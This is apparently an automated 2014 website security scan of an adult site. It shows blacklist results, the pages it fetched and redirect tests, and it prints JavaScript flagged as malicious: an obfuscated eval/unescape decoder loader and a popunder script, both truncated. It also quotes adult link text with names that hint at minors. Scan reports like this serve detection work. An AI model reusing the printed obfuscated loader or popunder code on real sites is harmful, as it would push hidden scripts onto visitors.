Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vofman.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vofman.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vofman.com/ | 200 OK Content-Length: 50503 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.trafficholder.com ...[4521 bytes skipped]... br/><td> </font></a></b></td> <td> </font></a></b></td> </tr> </table> </font><br> <table><tr valign=center> <td align=center> <b><font size=1 face=verdana>Webmasters : <a href=http://www.pussytrades.com>Trade traffic </a> | <a href="http://www.trafficholder.com/aff.php?melron"> Buy/Sell Traffic </a> | <a href="http://www.pussytrades.com/abuse.html"> Content Removal / Abuse Report</a> <br> <br><table width=750> <tr><td> <table border="1" bordercolor="000000" width=920><tr><td align=center> <font face=verdana size=2>Parents please protect your kids from accessing sex movies by simply using your browser's surfing preference ...[553 bytes skipped]... | ||
http://adspaces.ero-advertising.com/adspace/136125.js | 200 OK Content-Length: 2431 Content-Type: application/javascript | clean |
http://vofman.com/out/out.php?id=938712&url=http://www.ratx.com/tube/355475147/Just_Turned_18 | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 20:27:08 GMT Location: http://www.vofman.com/tp/out.php?p=0&link=BC Server: Apache/2.2.8 (Unix) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.13 | clean |
http://www.vofman.com/tp/out.php?p=0&link=bc | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Sep 2014 20:27:08 GMT Location: http://www.ratx.com/tube/13231509/Young_Russian_Virgin Server: Apache/2.2.8 (Unix) Content-Length: 0 Content-Type: text/html Set-Cookie: tp=MXwxfDE0MTE1MDQwMjl8MTQxMTUwNDAyOXwxOw%3D%3D; expires=Wed, 24-Sep-2014 20:27:09 GMT; path=/ Set-Cookie: ca=redirected X-Powered-By: PHP/5.2.13 | clean |
http://www.ratx.com/tube/13231509/young_russian_virgin | 200 OK Content-Length: 10151 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;eval(unescape('va\162%20qy%37%3D%27%27%3B%71%79%38%3D\123%74ri\156%67%2Ef\162o\155%43%68\141\162Cod\145%28%31%33%2C%31%30%29%3Bfo%72%28\151%3D%30%3B%69%3C%32%33%35%35%3B\151%2B%2B%29%7Bq%79%37%2B%3Dqy%38%7D%3B\146un\143ti\157%6E Decoded script: k=unescape('%0D%0A');function und1(s){var un='';l=s.length;oh=Math.round(l/2);for(i=0;i<=oh;i++){a=s.charAt(i);b=s.charAt(i+oh);c=a+b;un=un+c;};O=un.substr(0,l);};und1(se);eval(O);function und2(x){x=x.replace(/`/g,"'");x=x.replace(/@@/g,'\\');f = /qg/g;x=x.replace(f,k);document.write(x)}; k=unescape('%0D%0A');function und1(s){var un='';l=s.length;oh=Math.round(l/2);for(i=0;i<=oh;i++){a=s.charAt(i);b=s.charAt(i+oh);c=a+b;un=un+c;};O=un.substr(0,l);};und1(se);eval(O);function und2(x Antivirus reports:
| ||
http://www.ratx.com/fpc.js | 200 OK Content-Length: 1982 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var puShown = false; function doOpen(url) { if ( puShown == true ) { return true; } win = window.open(url, 'ljPu', 'toolbar,status,resizable,scrollbars,menubar,location,height=960,width=1200'); if ( win ) { win.blur(); puShown = true; } } } function checkTarget(e) { if ( !getCookie('re4k') ) { var e = e || window.event; var browLangCode = navigator.browserLanguage; var refer = window.location.href; var url = "http://www.tubery.net"; var win = doOpen(url); setCookie('rek', 1, 24*60*60*1000); } } initPu(); Antivirus reports:
| ||
http://adspaces.ero-advertising.com/adspace/135975.js | 200 OK Content-Length: 2431 Content-Type: application/javascript | clean |
http://vofman.com/movies/videos.php?link=top&to=hdteensex.org | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=24sextube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=1teenporn.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=tubemaxporn.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=moviemo.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=youngschoolgirls.biz | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=teenpornxxx.net | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=yeahteentube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://vofman.com/movies/videos.php?link=top&to=redpeppertube.com | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vofman.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 20:27:07 GMT
Accept-Ranges: bytes
Server: Apache/2.2.8 (Unix)
Content-Type: text/html
GET / HTTP/1.1
Host: vofman.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 20:27:07 GMT
Accept-Ranges: bytes
Server: Apache/2.2.8 (Unix)
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: vofman.com
Referer: http://www.google.com/search?q=vofman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vofman.com
Referer: http://www.google.com/search?q=vofman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.